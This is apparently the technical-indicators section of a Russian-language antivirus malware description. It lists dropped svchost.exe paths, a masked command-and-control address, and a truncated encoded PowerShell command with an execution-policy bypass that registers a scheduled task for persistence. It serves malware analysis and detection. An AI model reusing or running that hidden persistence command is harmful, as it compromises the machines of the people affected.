Техническая информация
- <SYSTEM32>\tasks\svchost.exe
- %APPDATA%\svchost.exe
- '15#.#4.211.151':56001
- '15#.#4.211.151':56001
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZ...